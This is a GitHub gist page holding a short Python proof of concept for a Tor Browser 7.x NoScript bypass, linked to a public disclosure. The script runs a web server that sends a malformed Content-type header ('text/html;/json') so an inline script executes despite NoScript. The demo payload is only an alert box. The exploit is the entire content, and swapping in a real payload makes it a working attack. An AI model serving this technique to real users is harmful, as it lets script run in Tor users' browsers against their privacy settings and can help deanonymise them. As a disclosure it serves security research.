Skip to content

Instantly share code, notes, and snippets.

@Ekultek

Ekultek/TorBrowser_7.x_NoScript_bypass.py

Forked from x0rz/TorBrowser_7.x_NoScript_bypass.py
Created September 10, 2018 15:02
Show Gist options
  • Save Ekultek/3d50f300f022a11ba0f0df8d47378a41 to your computer and use it in GitHub Desktop.
Save Ekultek/3d50f300f022a11ba0f0df8d47378a41 to your computer and use it in GitHub Desktop.
Download ZIP
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
Raw
TorBrowser_7.x_NoScript_bypass.py
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
PORT_NUMBER = 31337
class myHandler(BaseHTTPRequestHandler):
#Handler for the GET requests
def do_GET(self):
self.send_response(200)
self.send_header('Content-type','text/html;/json') # Here is where the magic happens
self.end_headers()
self.wfile.write("<html>Tor Browser 7.x PoC<script>alert('NoScript bypass')</script></html>")
return
try:
server = HTTPServer(('', PORT_NUMBER), myHandler)
print 'Started httpserver on port ' , PORT_NUMBER
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment